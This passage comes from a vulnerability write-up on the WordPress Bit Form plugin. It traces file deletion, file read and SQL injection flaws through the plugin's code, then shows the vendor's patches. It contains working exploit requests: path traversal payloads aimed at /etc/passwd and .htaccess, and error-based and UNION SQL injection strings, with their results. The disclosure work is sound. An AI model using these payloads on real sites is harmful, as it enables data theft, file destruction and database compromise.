Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7C2ed64b58bd1e6545e080831efa73208d7cd7a7d7db74f82d917bf1d084221f56; wp-settings-time-1=1724314921; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7Cc3ff3cd5203d9aa8bd10333b517737a257f01a675a5701cfae83a2855c027d65; PHPSESSID=btmj60280414pvpn1970aan8n7

{"formID":["../../../../../../../../../../../../../var/www/html/test.txt"]}

root@9e2f4f189063:/var/www/html# ls -lah test.txt 
ls: cannot access 'test.txt': No such file or directory

Nice! It's gone!

Arbitrary File Deletion via Method deleteAForm

Next up, the final method of this arbitrary file deletion, deleteAForm:

  public function deleteAForm($Request, $post)
  {
    if (isset($Request['id'])) {
      $formID = wp_unslash($Request['id']);
    } else {
      $formID = wp_unslash($post->id);
    }
    [...]
    $fileHandler = new FileHandler();
    if (file_exists(BITFORMS_UPLOAD_DIR . DIRECTORY_SEPARATOR . $formID)) {
      $fileHandler->rmrf(BITFORMS_UPLOAD_DIR . DIRECTORY_SEPARATOR . $formID);
    }
    if (file_exists(BITFORMS_UPLOAD_DIR . DIRECTORY_SEPARATOR . $formID)) {
      $fileHandler->rmrf(BITFORMS_UPLOAD_DIR . DIRECTORY_SEPARATOR . $formID);
    }
    if (file_exists(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR . 'bitform-' . $formID . '.css')) {
      unlink(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR . 'bitform-' . $formID . '.css');
    }
    if (file_exists(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR . 'bitform-layout-' . $formID . '.css')) {
      unlink(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR . 'bitform-layout-' . $formID . '.css');
    }
    if (file_exists(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR . 'bitform-custom-' . $formID . '.css')) {
      unlink(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR . 'bitform-custom-' . $formID . '.css');
    }
    if (file_exists(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-scripts' . DIRECTORY_SEPARATOR . 'bitform-custom-' . $formID . '.js')) {
      unlink(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-scripts' . DIRECTORY_SEPARATOR . 'bitform-custom-' . $formID . '.js');
    }
    if (file_exists(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR . 'bitform-conversational-' . $formID . '.css')) {
      unlink(BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR . 'form-styles' . DIRECTORY_SEPARATOR . 'bitform-conversational-' . $formID . '.css');
    }
    [...]
  }

Which is used by class AdminAjax method deleteAForm and AJAX action bitforms_delete_aform:

class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_delete_aform', [$this, 'deleteAForm']);
    [...]
  }
  [...]
  public function deleteAForm()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      $formHandler = FormHandler::getInstance();
      $status = $formHandler->admin->deleteAForm($_REQUEST, $input);
      [...]
    } else {
      [...]
    }
  }

Again, we can delete any files in the file system using the source formID, as there's no sanitization in the formID whatsoever.

Let's test this file deletion vulnerability one last time!

Create a test file:

root@9e2f4f189063:/var/www/html# echo -n 'test' > test.txt
root@9e2f4f189063:/var/www/html# chown www-data:www-data test.txt
root@9e2f4f189063:/var/www/html# ls -lah test.txt 
-rw-r--r-- 1 www-data www-data 4 Aug 22 11:43 test.txt

Send the following POST request:

POST /wp-admin/admin-ajax.php?action=bitforms_delete_aform&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 75
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7C2ed64b58bd1e6545e080831efa73208d7cd7a7d7db74f82d917bf1d084221f56; wp-settings-time-1=1724314921; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7Cc3ff3cd5203d9aa8bd10333b517737a257f01a675a5701cfae83a2855c027d65; PHPSESSID=btmj60280414pvpn1970aan8n7

{"id":"../../../../../../../../../../../../../var/www/html/test.txt"}

Note: This time the parameter is id instead of formID.

root@9e2f4f189063:/var/www/html# ls -lah test.txt 
ls: cannot access 'test.txt': No such file or directory

Let's go!

Arbitrary File Read

Alrighty! Let's find arbitrary file read sinks! After some searching, we can find a sink in class FileHandler method cpyr:

final class FileHandler
{
  [...]
  public function cpyr($source, $destination)
  {
    if (is_dir($source)) {
      mkdir($destination);
      // chmod($destination, 0744);
      $objects = scandir($source);
      foreach ($objects as $object) {
        if ('.' !== $object && '..' !== $object) {
          if (is_dir($source . DIRECTORY_SEPARATOR . $object) && !is_link($source . DIRECTORY_SEPARATOR . $object)) {
            cpyr($source . DIRECTORY_SEPARATOR . $object, $destination . DIRECTORY_SEPARATOR . $object);
          } elseif (is_file($source . DIRECTORY_SEPARATOR . $object)) {
            copy($source . DIRECTORY_SEPARATOR . $object, $destination . DIRECTORY_SEPARATOR . $object);
            // chmod($destination. DIRECTORY_SEPARATOR .$object, 0644);
          } else {
            symlink($source . DIRECTORY_SEPARATOR . $object, $destination . DIRECTORY_SEPARATOR . $object);
          }
        }
      }
    } else {
      copy($source, $destination);
    }
  }

As the method name suggested, it's similar to Linux's cp -yr command, which copies files recursively.

Again, find out where does this method is being used. Eventually, we'll find only one method uses it, which is duplicateFormEntry from class AdminFormHandler.

First, it validates the source formID and entries is an array. Then it checks the formID is belonged to a legit form:

class AdminFormHandler
{
  [...]
  public function duplicateFormEntry($Request, $post)
  {
    if (isset($Request['formID'])) {
      $formID = wp_unslash($Request['formID']);
      $entries = wp_unslash($Request['entries']);
    } else {
      $formID = wp_unslash($post->formID);
      $entries = wp_unslash($post->entries);
    }
    if (is_null($formID) || !is_array($entries) || empty($entries)) {
      return new WP_Error('empty_form', __('Form id or entries id is invalid', 'bit-form'));
    }

    $formManager = new AdminFormManager($formID);
    if (!$formManager->isExist()) {
      return new WP_Error('empty_form', __('Form does not exist', 'bit-form'));
    }
    [...]

After that, it'll duplicate the form's submission entries and their metadata via the database:

class AdminFormHandler
{
  [...]
  public function duplicateFormEntry($Request, $post)
  {
    [...]
    $fileHandler = new FileHandler();
    $result = [];
    foreach ($entries as $entryIndex => $entryID) {
      $duplicatedEntryId = $formEntryModel->insert(
        [
          'form_id'     => $formID,
          'user_id'     => $user_details['id'],
          'user_ip'     => $user_details['ip'],
          'user_device' => $user_details['device'],
          'referer'     => 'duplicate of #' . $entryID,
          'status'      => 1,
          'created_at'  => $user_details['time'],
        ]
      );
      if ($duplicatedEntryId) {
        $duplicate_status = $entryMeta->duplicateEntryMeta(
          [
            'duplicateID' => $duplicatedEntryId,
            'entryID'     => $entryID,
          ]
        );
        if ($duplicate_status) {
          $result['details'][$entryID] = $duplicatedEntryId;
          $duplicate_count = $duplicate_count + 1;
          if (file_exists(BITFORMS_UPLOAD_DIR . "/$formID/$entryID")) {
            $fileHandler->cpyr(
              BITFORMS_UPLOAD_DIR . "/$formID/$entryID",
              BITFORMS_UPLOAD_DIR . "/$formID/$duplicatedEntryId"
            );
          }
        }
      }
    }
    [...]

Next, after successfully duplicating the entry, it'll copy every files inside that form's entry ID directory to <BITFORMS_UPLOAD_DIR>/<formID>/<duplicatedEntryId>:

class AdminFormHandler
{
  [...]
  public function duplicateFormEntry($Request, $post)
  {
    [...]
    $fileHandler = new FileHandler();
    $result = [];
    foreach ($entries as $entryIndex => $entryID) {
      [...]
      if ($duplicatedEntryId) {
        [...]
        if ($duplicate_status) {
          [...]
          if (file_exists(BITFORMS_UPLOAD_DIR . "/$formID/$entryID")) {
            $fileHandler->cpyr(
              BITFORMS_UPLOAD_DIR . "/$formID/$entryID",
              BITFORMS_UPLOAD_DIR . "/$formID/$duplicatedEntryId"
            );
          }
        }
      }
    }
    [...]

Finally, after copying all the files, it'll return the $duplicatedEntryId:

class AdminFormHandler
{
  [...]
  public function duplicateFormEntry($Request, $post)
  {
    [...]
    $count = $formEntryModel->count(
      [
        'form_id' => $formID,
      ]
    );
    $formManager->resetSubmissionCount(intval($count[0]->count));
    $result['message'] = 1 === count($entries) ? __('Entry Duplicated successfully', 'bit-form') : __('Entries Duplicated successfully', 'bit-form');
    return ($total_entries === $duplicate_count) ? $result : false;

Hmm… What's that BITFORMS_UPLOAD_DIR constant value? If we search for that, we'll find this at /wp-content/plugins/bit-form/includes/loader.php:

$uploadDirInfo = wp_upload_dir();
$wpUploadbaseDir = $uploadDirInfo['basedir'];
[...]
$bitformsUploadBaseDir = $wpUploadbaseDir . DIRECTORY_SEPARATOR . 'bitforms';
[...]
define('BITFORMS_UPLOAD_DIR', $bitformsUploadBaseDir . DIRECTORY_SEPARATOR . 'uploads');

With that said, constant BITFORMS_UPLOAD_DIR's value is /var/www/html/wp-content/uploads/bitforms/uploads.

Now, in this case, we can use path traversal payload in our source entries to copy any files into directory /var/www/html/wp-content/uploads/bitforms/uploads/<formID>/<duplicatedEntryId>, and then we can read that copied file!

Let's figure out how this method is being used! Indeed, just like the previous one, this method is called from class AdminAjax method duplicateFormEntry, which is used by AJAX action bitforms_duplicate_form_entries:

class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_duplicate_form_entries', [$this, 'duplicateFormEntry']);
    [...]
  }
  public function duplicateFormEntry()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      $formHandler = FormHandler::getInstance();
      $status = $formHandler->admin->duplicateFormEntry($_REQUEST, $input);
      [...]
    } else {
      [...]
    }
  }

Let's try this!

Since we already created a new form during testing the arbitrary file deletion in method deleteBlukFormEntries, we'll just send the following POST request:

POST /wp-admin/admin-ajax.php?action=bitforms_duplicate_form_entries&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 94
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7C2ed64b58bd1e6545e080831efa73208d7cd7a7d7db74f82d917bf1d084221f56; wp-settings-time-1=1724314921; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7Cc3ff3cd5203d9aa8bd10333b517737a257f01a675a5701cfae83a2855c027d65; PHPSESSID=btmj60280414pvpn1970aan8n7

{"formID":"1","entries":["../../../../../../../../../../../../../etc/passwd"]}

root@9e2f4f189063:/var/www/html# ls -lah wp-content/uploads/bitforms/uploads/1/
total 12K
drwxr-xr-x 2 www-data www-data 4.0K Aug 22 12:29 .
drwxr-xr-x 3 www-data www-data 4.0K Aug 22 11:59 ..
-rw-r--r-- 1 www-data www-data  922 Aug 22 12:29 1
root@9e2f4f189063:/var/www/html# head wp-content/uploads/bitforms/uploads/1/1
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

Nice! Can we read this copied file?

┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-read-deletion)-[2024.08.22|20:30:41(HKT)]
└> curl http://localhost/wp-content/uploads/bitforms/uploads/1/1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at localhost Port 80</address>
</body></html>

Huh? It returns HTTP status code "403 Forbidden". Since I'm using Apache HTTP server, maybe there's a .htaccess file to restrict users being accessing that directory's files?

If we list all the hidden files at directory /var/www/html/wp-content/uploads/bitforms/uploads/, there's a .htaccess file:

root@9e2f4f189063:/var/www/html# ls -lah wp-content/uploads/bitforms/uploads/
total 20K
drwxr-xr-x 3 www-data www-data 4.0K Aug 22 11:59 .
drwxr-xr-x 5 www-data www-data 4.0K Aug 22 08:52 ..
-rw-r--r-- 1 www-data www-data  220 Aug 22 08:21 .htaccess
drwxr-xr-x 2 www-data www-data 4.0K Aug 22 12:29 1
-rw-r--r-- 1 www-data www-data    6 Aug 22 08:21 index.php

Let's take a look at that file:

<IfDefine php_flag>
    php_flag engine off
</IfDefine>
Options -Indexes
Order allow,deny
Deny from all
Require all denied

In here, we can see that it uses Apache's access control to deny all requests to everything in directory /var/www/html/wp-content/uploads/bitforms/uploads/.

Hmm… Can we bypass that?

Arbitrary File Read Bypass via Arbitrary File Deletion

Ah ha! We can chain with the arbitrary file deletion vulnerability to delete that .htaccess file, and then we can read the copied file!

Let's delete that file!!

POST /wp-admin/admin-ajax.php?action=bitforms_delete_aform&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 106
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7C2ed64b58bd1e6545e080831efa73208d7cd7a7d7db74f82d917bf1d084221f56; wp-settings-time-1=1724314921; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724485955%7C3MuslQ6YljdYmnUlWZHpXwkZNaOrPk5joqULpXwVLYr%7Cc3ff3cd5203d9aa8bd10333b517737a257f01a675a5701cfae83a2855c027d65; PHPSESSID=btmj60280414pvpn1970aan8n7

{"id":"../../../../../../../../../../../../../var/www/html/wp-content/uploads/bitforms/uploads/.htaccess"}

┌[siunam♥Mercury]-(~/bug-bounty/Wordfence/PoC/bit-form/file-read-deletion)-[2024.08.22|20:43:00(HKT)]
└> curl http://localhost/wp-content/uploads/bitforms/uploads/1/1
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
[...]

Let's go!!!

The Patch

To fix all 3 arbitrary file deletion and 1 arbitrary file read, it can be done by validating the id, formID, and entries array's item to be an integer.

In version 2.13.10, we can see one of the examples from the revision log:

class AdminFormHandler
{
  [...]
  public function deleteAForm($Request, $post)
  {
    if (isset($Request['id'])) {
      $formID = wp_unslash($Request['id']);
    } else {
      $formID = wp_unslash($post->id);
    }
    [...]
    if (!filter_var($formID, FILTER_VALIDATE_INT)) {
      return new WP_Error('invalid_form', __('Form id is invalid.', 'bit-form'));
    }
    [...]
  }

Timeline

Authenticated (Administrator+) SQL Injection (CVE-2024-7780)

After finding all possible arbitrary file read/upload/deletion sinks, I decided to find SQL injection sinks. On WordPress, the sink typically is variable $wpdb and without any method prepare to prepare the SQL statement.

I then quickly found a SQL injection sink, which is from class Model method execute:

class Model
{
  public function __construct()
  {
    global $wpdb;
    $this->app_db = $wpdb;
    $this->table_name = $wpdb->prefix . static::$table;
  }
  [...]
  protected function execute($sql, $values = null)
  {
    if (is_null($values)) {
      $preparedQuery = $sql;
    } else {
      $preparedQuery = $this->app_db->prepare($sql, $values);
    }
    // echo " Q S " . $preparedQuery . " Q  EE";
    if (empty($preparedQuery)) {
      $this->db_response = new WP_Error('null_query', __('prepared query is empty', 'bit-form'));
    } else {
      $this->db_response = false !== stripos($preparedQuery, 'DELETE') ? $this->app_db->query($preparedQuery)
          : $this->app_db->get_results($preparedQuery, OBJECT_K);
    }
    // print_r($this->app_db->last_query);
    return $this;
  }

As you can see, this class Model is actually a SQL query builder, quite complex to be honest. A SQL query builder like this typically has tons of methods to aid the developer to construct different SQL queries without writing raw SQL queries. However, if the builder misused or implemented badly, SQL injection vulnerabilities will still emerge.

In this execute method, we can see it only prepares a given raw SQL query ($sql) IF the $values is not null, then execute it and get the result of the raw SQL query.

Hmm… It is possible to execute the unprepared raw SQL query? Like, what if the developer forgot to parse the $values to this method?

Another similar pattern can be seen in method duplicate and get.

Let's take a closer look at method get:

class Model
{
  [...]
  public function get($item = '*', $condition = [], $limit = null, $offset = null, $order_by = null, $order_follow = null)
  {
    [...]
    if (\is_array($item)) {
      $column_to_select = implode(',', $item);
    } else {
      $column_to_select = $item;
    }
    [...]
    if (empty($condition)) {
      $sql = "SELECT $column_to_select FROM `$this->table_name` $order $paginate";
      $all_values = null;
    } else {
      $formatted_conditions = $this->getFormatedCondition($condition);
      if ($formatted_conditions) {
        $condition_to_check = $formatted_conditions['conditions'];
        $all_values = $formatted_conditions['values'];
      } else {
        $condition_to_check = null;
        $all_values = null;
      }
      $sql = "SELECT $column_to_select FROM `$this->table_name`"
          . $condition_to_check . $order . $paginate;
    }
    return $this->execute($sql, $all_values)->getResult();
  }

In here, after building the SELECT clause, it parses the raw SQL query $query to the method execute. If there's no condition, the WHERE clause is not built, thus the raw SQL query looks like this:

$sql = "SELECT $column_to_select FROM `$this->table_name` $order $paginate";

This method looks fine, but what if the developer mistakenly parses the $condition to $item, such as this:

$condition = [ "id" => "evil_ID_here" ];
Model::get($condition);

Which builds the following SQL query:

SELECT evil_ID_here FROM `table_name_here`

Hmm… Let's find a misused method get. After searching, we can see there are 2 methods in class EmailTemplateHandler uses that method, which were method getAllTemplate and duplicateTemplate:

In getAllTemplate, it uses the method get correctly:

final class EmailTemplateHandler
{
  [...]
  public function getAllTemplate($templateID = null, $userID = null)
  {
    $condition = [
      'form_id' => static::$_formID,
    ];
    if (!is_null($templateID)) {
      $condition = array_merge($condition, ['id' => $templateID]);
    }
    if (!is_null($userID)) {
      $condition = array_merge($condition, ['user_id' => $userID]);
    }
    return static::$_emailTemplateModel->get(
      [
        'id',
        'title',
        'sub',
        'body'
      ],
      $condition
    );
  }

However, method duplicateTemplate is indeed misused the method get:

final class EmailTemplateHandler
{
  [...]
  public function duplicateTemplate($templateID)
  {
    $templateDetail = static::$_emailTemplateModel->get(
      [
        'id'      => $templateID,
        'form_id' => static::$_formID,
      ]
    );
    [...]
  }

As you can see, both $templateID and static::$_formID are supposed to be in the $condition parameter, id and form_id are supposed to be in the $item parameter!

Nice! If we can somehow control $templateID or static::$_formID, it's jover, we can exploit the SQL injection vulnerability.

By tracing back the execution flow, this method duplicateTemplate is used by class AdminFormHandler, which eventually used by class AdminAjax method duplicateAMailTemplate and AJAX action bitforms_duplicate_mailtemplate:

class AdminFormHandler
{
  [...]
  public function duplicateAMailTemplate($Request, $post)
  {
    if (isset($Request['formID']) && $Request['id']) {
      $formID = json_decode(wp_unslash($Request['formID']));
      $id = wp_unslash($Request['id']);
    } else {
      $formID = wp_unslash($post->formID);
      $id = wp_unslash($post->id);
    }
    [...]
    $emailTemplateHandler = new EmailTemplateHandler($formID);
    $duplicate_status = $emailTemplateHandler->duplicateTemplate($id);
    [...]
  }
class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_duplicate_mailtemplate', [$this, 'duplicateAMailTemplate']);
    [...]
  }
  [...]
  public function duplicateAMailTemplate()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      $formHandler = FormHandler::getInstance();
      $status = $formHandler->admin->duplicateAMailTemplate($_REQUEST, $input);
      [...]
    } else {
      [...]
    }
  }

To test this vulnerability more effectively, I'll use Xdebug and Visual Studio Code to debug it.

To do so, I'll set a breakpoint at class EmailTemplateHandler method duplicateTemplate's first line, which calls method get in class Model:

Then press F5 to start debugging.

After that, we can send the following POST request to trigger the breakpoint:

POST /wp-admin/admin-ajax.php?action=bitforms_duplicate_mailtemplate&_ajax_nonce=56951b1f2d HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 23

{"formID":"1","id":"1"}

Next, we can click the "Step Into" button or press F11 to enter the code of the current line if it is a function call:

As you can see, variable $condition is an empty array, but variable $item has 2 array items!!

If we click the "Step Over" button or press F10 multiple times until the return, we can see that variable $sql is like this:

SELECT 1,1 FROM `wp_bitforms_email_template`

Nice! We can confirm that class EmailTemplateHandler method duplicateTemplate is indeed vulnerable to SQL injection!

Now, we can disable the breakpoint by unchecking the box:

And try the following MySQL error-based SQL injection payload:

updatexml(null,concat(0x0a,'MySQL version: ',version()),null)-- -

Note 1: The payload is from PayloadsAllTheThings

Note 2: Both parameter formID and id are vulnerable to SQL injection

Nice!! It worked!

The Patch

In this SQL injection vulnerability, the patch should be fixing the wrong usage of class Model method get. However, the vendor decided to validate variable $formID and $id must be an integer only?

In version 2.13.10 revision log, we can see how the vendor validate those variables:

class AdminFormHandler
{
  [...]
  public function duplicateAMailTemplate($Request, $post)
  {
    [...]
    if (false === filter_var($id, FILTER_VALIDATE_INT)) {
      return new WP_Error('empty_form', 'Invalid Email Template ID.');
    }

    if (false === filter_var($formID, FILTER_VALIDATE_INT)) {
      return new WP_Error('empty_form', 'Invalid Form ID.');
    }
    
    $emailTemplateHandler = new EmailTemplateHandler($formID);
    $duplicate_status = $emailTemplateHandler->duplicateTemplate($id);
    [...]
  }

I mean… That's also a different way to fix the vulnerability. ¯_(ツ)_/¯

Timeline

Authenticated (Administrator+) SQL Injection via getLogHistory Function (CVE-2024-7702)

Another SQL injection I've found was another misused in the Model class query builder. By searching the execute method from class Model, we can find method geLogHistory from FormEntryLogModel:

class FormEntryLogModel extends Model
{
  [...]
  public function geLogHistory($form_id, $entry_id)
  {
    $sql = "SELECT * FROM `{$this->app_db->prefix}bitforms_form_entry_log` where form_entry_id=$entry_id AND form_id=$form_id order By created_at DESC";

    $logs = $this->execute($sql)->getResult();
    [...]
    $ids = [];
    foreach ($logs as $log) {
      $ids[] = $log->id;
    }
    if (isset($logs->errors['result_empty'])) {
      [...]
    } else {
      $allLogId = preg_replace('/"/', '', implode(',', $ids));
      $sql2 = "SELECT * FROM `{$this->app_db->prefix}bitforms_form_log_details` WHERE `log_id` IN ($allLogId)";
      $integrations = $this->execute($sql2)->getResult();
      [...]
    }
  }

As you can see in this method there are 2 SQL injection vulnerabilities.

Instead of using the query builder to build a SQL query, it parses a raw SQL query to method execute. In the previous SQL injection vulnerability, I've mentioned that if method execute variable $values is null, it'll NOT prepare or escape the raw SQL query.

In this case, this method misused the method execute. The correct way to use it is like this:

$sql = "SELECT * FROM `{$this->app_db->prefix}bitforms_form_entry_log` where form_entry_id=%d AND form_id=%d order By created_at DESC";
$values = [ "form_entry_id_here", "form_id_here" ];

$this->execute($sql, $values);

By tracing back the execution flow, we can see that class AdminFormHandler method getLogHistory uses that misused execute method:

class AdminFormHandler
{
  [...]
  public function getLogHistory($Request, $post)
  {
    if (isset($Request['formID'])) {
      $formID = wp_unslash($Request['formID']);
      $entryID = wp_unslash($Request['entryID']);
    } else {
      $formID = wp_unslash($post->formID);
      $entryID = wp_unslash($post->entryID);
    }
    [...]
    $formManager = new AdminFormManager($formID);
    if (!$formManager->isExist()) {
      return new WP_Error('empty_form', __('Form does not exist.', 'bit-form'));
    }
    $formLogModel = new FormEntryLogModel();

    $log_history = $formLogModel->geLogHistory($formID, $entryID);
    return $log_history;
  }

Which is again used by class AdminAjax method getLogHistory and AJAX action bitforms_form_log_history:

class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_form_log_history', [$this, 'getLogHistory']);
    [...]
  }
  public function getLogHistory()
  {
    if (wp_verify_nonce(sanitize_text_field($_REQUEST['_ajax_nonce']), 'bitforms_save')) {
      $inputJSON = file_get_contents('php://input');
      $input = json_decode($inputJSON);
      $formHandler = FormHandler::getInstance();
      $status = $formHandler->admin->getLogHistory($_REQUEST, $input);
      [...]
    } else {
      [...]
    }
  }

Therefore, AJAX action bitforms_form_log_history is vulnerable to SQL injection.

Let's try that!

Since we already created a form in the previous vulnerability demonstration, we can send the following POST request to exploit the SQL injection vulnerability:

POST /wp-admin/admin-ajax.php?action=bitforms_form_log_history&_ajax_nonce=780bef0a26 HTTP/1.1
Host: localhost
Content-Type: text/plain;charset=UTF-8
Content-Length: 151
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1724553914%7C9pNaCWccoYSDyYoiSO4e07YnorNyXoFaKEF0H5QnZkX%7C58c18d2f8b6415954d2a339d57d57b3c1fe7bc913f22130d5780f0d2a85c49f9; wp-settings-time-1=1724390118; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1724553914%7C9pNaCWccoYSDyYoiSO4e07YnorNyXoFaKEF0H5QnZkX%7Cf943227a153b21afbc65dbd93c78032c2ad0055a49af9c5fedf5d1281404dbd7

{"formID":"1","entryID":"0 UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('Database user: ', user()),concat('MySQL version: ', @@version)-- -"}

Nice! It worked!

The Patch

Again, to fix this vulnerability, the vendor could correct the misused execute method or validate the formID and entryID must be an integer. We can view version 2.13.10 revision log for the implementation of the patch:

class FormEntryLogModel extends Model
{
  [...]
  public function geLogHistory($form_id, $entry_id)
  {
    $sql = "SELECT * FROM `{$this->app_db->prefix}bitforms_form_entry_log` where form_entry_id=%d AND form_id=%d order By created_at DESC";
    $logs = $this->execute($sql, [$entry_id, $form_id])->getResult();
    [...]
    $ids = [];
    foreach ($logs as $log) {
      $ids[] = (int) $log->id;
    }
    if (isset($logs->errors['result_empty'])) {
      [...]
    } else {
      $allLogId = preg_replace('/"/', '', implode(',', $ids));
      $sql2 = "SELECT * FROM `{$this->app_db->prefix}bitforms_form_log_details` WHERE `log_id` IN ($allLogId)";
      $integrations = $this->execute($sql2)->getResult();
      [...]
    }
  }

Timeline

Authenticated (Administrator+) Arbitrary JavaScript File Uploads (CVE-2024-7775)

After finding many server-side vulnerabilities, it's time to find some client-side vulnerabilities!

As usual, I started searching for client-side vulnerabilities sinks. Some common sinks I'll be looking for are file upload related built-in PHP functions, such as fwrite, file_put_contents, copy, and more.

The reason I'll look for these sinks is that if it doesn't validate dangerous file types like .svg, .js, .pdf, it's possible to overwrite/upload a file that contains an XSS payload.

Indeed, we can find method saveFile from class Helpers is suspected to be vulnerable to the above scenario:

class Helpers
{
  [...]
    /**
   * @method name : saveFile
   * @description : save js/css field to disk
   * @param  : $path => like(dirName/css), $fileName => main.css, $script
   * @return : boolean
   */
  public static function saveFile($path, $fileName, $script, $fileOpenMode = 'a')
  {
    try {
      $rootDir = BITFORMS_CONTENT_DIR . DIRECTORY_SEPARATOR;
      $path = trim($path, '/');
      $pathArr = explode('/', $path); // like "fieldname/user => [Fieldname, user]
      foreach ($pathArr as $d) {
        $rootDir .= $d . DIRECTORY_SEPARATOR;
        if (!realpath($rootDir)) {
          mkdir($rootDir);
        }
      }
      $fullPath = $rootDir . $fileName;
      $file = fopen($fullPath, $fileOpenMode);
      if (false === $file) {
        throw new Exception("Failed to open file: $fullPath");
      }
      if (false === fwrite($file, $script)) {
        throw new Exception("Failed to write to file: $fullPath");
      }
      if (false === fclose($file)) {
        throw new Exception("Failed to close file: $fullPath");
      }
      return true;
    } catch (\Exception $e) {
      [...]
    }
  }

As you can see, this helper method is to save JavaScript or CSS files to disk. Sounds very interesting!

If we search this method's usage, we can find this interesting method customCodeFileSaveOrDelete from class FrontEndScriptGenerator:

class FrontEndScriptGenerator
{
  [...]
  public static function customCodeFileSaveOrDelete($script, $path, $fileName)
  {
    if ($script) {
      Helpers::saveFile($path, $fileName, $script, 'w');
    } else {
      [...]
    }
    return true;
  }

Which is called from method customCodeFile:

class FrontEndScriptGenerator
{
  [...]
  public static function customCodeFile($formId, $customCodes)
  {
    // for js file
    $path = 'form-scripts';
    $fileName = "bitform-custom-$formId.js";
    self::customCodeFileSaveOrDelete($customCodes->JavaScript, $path, $fileName);

    // for css file
    $path = 'form-styles';
    $fileName = "bitform-custom-$formId.css";
    self::customCodeFileSaveOrDelete($customCodes->CSS, $path, $fileName);

    return true;
  }

Hmm… Based on the method name, it seems like we could create some custom JavaScript or CSS file.

By tracing back the execution flow, we can confirm that theory:

class AdminAjax
{
  public function register()
  {
    [...]
    add_action('wp_ajax_bitforms_add_custom_code', [$this, 'addCustomCode']);
    [...]
  }
  public function addCustomCode()
  {
